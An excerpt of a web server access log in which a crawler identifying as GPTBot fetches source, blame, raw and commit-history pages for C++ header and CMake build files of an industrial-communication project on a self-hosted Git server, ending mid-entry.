"/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12018] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12511] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:15:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13027] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:41:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10243] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:41:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12918] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12019] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12847] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11317] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 11874] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12726] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10495] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12896] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 666] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:41:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 9937] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12613] [Gzip 6.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11316] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10234] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10410] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13610] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 2115] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" -[17/Feb/2026:15:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13028] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11170] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11491] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:41:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11521] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12468] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:41:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:15:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:41:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12969] [Gzip 5.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:15:41:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11825] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:15:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11145] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:41:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:41:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10083] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:15:41:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12838] [Gzip 6.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:15:41:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13641] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:15:41:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/transport_state.hpp" -[17/Feb/2026:15:41:26 +0000] - 200 200 - GET https 